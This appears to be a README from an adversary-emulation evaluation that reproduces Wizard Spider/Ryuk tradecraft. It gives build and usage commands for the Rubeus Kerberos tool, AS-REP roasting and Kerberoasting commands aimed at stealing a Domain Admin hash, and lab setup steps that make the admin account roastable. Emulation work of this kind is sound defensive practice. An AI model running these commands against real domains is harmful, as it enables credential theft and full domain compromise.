# Rubeus

"Rubeus is a C# toolset for raw Kerberos interaction and abuses."

The goal for this evaluation is to steal the hash of the Domain Admin as a Domain User.

# Build Instructions

Open the command prompt (cmd.exe), navigate to directory containing the Rubeus Visual Studio solution file (Rubeus.sln), and run the devenv.exe command:

cd wizard_spider\Resources\Rubeus "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe" Rubeus.sln /build Release

# alternate build command

"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\msbuild.exe" Rubeus.sln -property:Configuration=Release

The executable will be found in the bin\Release folder.

# Test Instructions

Open PowerShell

cd wizard_spider\Resources\Rubeus
rubeus_test.ps1

# Usage Examples

# execute AS-Rep Roast

rubeus.exe asreproast /domain:oz.local

# execute Kerberoast

# must be executed as a domain user (oz\user) NOT a local user (dorothy\user)

# may want to consider adding /format:hashcat as an argument (default format is John)

rubeus.exe kerberoast /domain:oz.local

# Cleanup Instructions

Open a command prompt or PowerShell

del rubeus.exe

# Misc

Conditions required to successfully compromise the Domain Admin password via Kerberoasting during the evaluation:

  • The Domain Admin must have a crackable password

  • The Domain Admin must have a Service Principal Name (SPN) associated with their account

# Example command to set the SPN:
setspn -s exchange/oz.local oz/kfleming

Additionally, the CTI indicates the adversary also attempts AS-Rep Roasting. For this to work, Kerberos pre-authentication must be disabled (not done by default).

Log into Domain Controller
Run (Windows-R) dsa.msc
Select Domain Admin account
Go to the Account tab
In account options, check 'Do not require Kerberos preauthentication'

# CTI Evidence

https://attack.mitre.org/groups/G0102/ https://thedfirreport.com/2020/10/08/ryuks-return/ https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

# References

https://github.com/GhostPack/Rubeus https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spn-setspn-syntax.aspx https://blog.zsec.uk/path2da-pt2/ https://docs.microsoft.com/en-us/visualstudio/ide/reference/build-devenv-exe?view=vs-2019